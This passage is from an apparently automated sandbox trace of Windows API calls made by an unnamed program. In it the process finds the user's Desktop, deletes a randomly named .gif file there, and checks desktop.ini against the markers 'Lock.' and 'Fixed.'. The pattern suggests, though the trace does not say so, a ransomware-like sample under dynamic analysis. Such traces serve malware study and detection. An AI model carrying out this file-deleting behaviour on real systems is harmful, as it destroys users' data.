(HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0163.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0163.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0163.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0163.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0163.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0163.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0163.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0163.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0163.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0163.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0163.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0163.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0163.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0163.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0163.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0163.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0163.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0163.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x100) returned 0x2416f30 [0163.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0163.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0163.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0163.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0163.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0163.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x7e) returned 0x24202f0 [0163.499] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/d1NqFAAxwvSf3pfr2yZp.gif", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\d1NqFAAxwvSf3pfr2yZp.gif", lpFilePart=0x8bedfc*="d1NqFAAxwvSf3pfr2yZp.gif") returned 0x3e [0163.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24202f0 | out: hHeap=0x25c0000) returned 1 [0163.499] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\d1NqFAAxwvSf3pfr2yZp.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\d1nqfaaxwvsf3pfr2yzp.gif")) returned 0x20 [0163.499] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\d1NqFAAxwvSf3pfr2yZp.gif", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x959a8ee0, ftCreationTime.dwHighDateTime=0x1d4d519, ftLastAccessTime.dwLowDateTime=0x51ef5600, ftLastAccessTime.dwHighDateTime=0x1d4d260, ftLastWriteTime.dwLowDateTime=0x51ef5600, ftLastWriteTime.dwHighDateTime=0x1d4d260, nFileSizeHigh=0x0, nFileSizeLow=0xd16c, dwReserved0=0x31, dwReserved1=0x4, cFileName="d1NqFAAxwvSf3pfr2yZp.gif", cAlternateFileName="D1NQFA~1.GIF")) returned 0xaa55e0 [0163.499] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\d1NqFAAxwvSf3pfr2yZp.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\d1nqfaaxwvsf3pfr2yzp.gif")) returned 1 [0163.501] FindNextFileW (in: hFindFile=0xaa55e0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x959a8ee0, ftCreationTime.dwHighDateTime=0x1d4d519, ftLastAccessTime.dwLowDateTime=0x51ef5600, ftLastAccessTime.dwHighDateTime=0x1d4d260, ftLastWriteTime.dwLowDateTime=0x51ef5600, ftLastWriteTime.dwHighDateTime=0x1d4d260, nFileSizeHigh=0x0, nFileSizeLow=0xd16c, dwReserved0=0x31, dwReserved1=0x4, cFileName="d1NqFAAxwvSf3pfr2yZp.gif", cAlternateFileName="D1NQFA~1.GIF")) returned 0 [0163.501] FindClose (in: hFindFile=0xaa55e0 | out: hFindFile=0xaa55e0) returned 1 [0163.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0163.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0163.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0163.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0163.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0163.501] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0163.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0163.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0163.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0163.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0163.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0163.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0163.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0163.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0163.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x2416f30 [0163.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0163.502] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0163.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0163.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0163.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ab340 [0163.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0163.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0163.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24acde0 [0163.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0163.502] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8bf440 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0163.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0163.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0163.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0163.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0163.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0163.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0163.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0163.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0163.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0163.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0163.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0163.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0163.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0163.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0163.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0163.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0163.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0163.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0163.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0163.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0163.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x100) returned 0x2416f30 [0163.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0163.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0163.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0163.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0163.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0163.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0163.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0163.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0163.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0163.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0163.512] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0163.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0163.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0163.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0163.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0163.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0163.513] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x7e) returned 0x24202f0 [0163.513] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/d1NqFAAxwvSf3pfr2yZp.gif", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\d1NqFAAxwvSf3pfr2yZp.gif", lpFilePart=0x8bf658*="d1NqFAAxwvSf3pfr2yZp.gif") returned 0x3e [0163.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24202f0 | out: hHeap=0x25c0000) returned 1 [0163.513] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\d1NqFAAxwvSf3pfr2yZp.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\d1nqfaaxwvsf3pfr2yzp.gif")) returned 0xffffffff [0163.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0163.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0163.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0163.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0163.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0163.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0163.513] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0163.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0163.513] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0163.513] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0163.513] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0163.513] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0163.513] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0163.513] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0163.513] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0163.514] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0163.514] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0163.514] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0163.514] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0163.514] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0163.514] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0163.514] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0163.514] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0163.514] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="desktop.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0163.514] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0163.514] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sktop.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0163.514] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0163.514] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="top.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0163.514] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0163.514] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0163.514] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0163.514] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0163.514] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0163.514] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0163.514] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0163.514] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0163.514] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0163.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d760 [0163.515] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0163.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0163.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0163.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0163.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0163.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0163.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0163.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0163.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0163.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0163.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0163.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0163.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0163.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0163.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0163.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0163.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0163.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0163.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0163.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0163.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0163.515] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="desktop.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0163.515] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0163.515] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sktop.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0163.516] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0163.516] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="top.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0163.516] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0163.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0163.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0163.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0163.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0163.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0163.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0163.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0163.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0163.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0163.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0163.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0163.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0163.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0163.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0163.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0163.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9390 | out: hHeap=0x25c0000) returned 1 [0163.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9390 [0163.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0163.516] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0163.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0163.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0163.516] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0163.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0163.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0163.517] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0163.517] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2da8 [0163.517] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0163.517] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0163.517] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0163.517] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0163.517] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0163.517] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0163.517] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0163.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0163.517] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x2416f30 [0163.517] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0163.517] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0163.517] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0163.517] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0163.517] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ab340 [0163.517] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0163.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0163.517] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa908 [0163.517] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0163.517] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8bf3b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0163.517] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0163.517] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0163.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0163.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0163.518] HeapFree 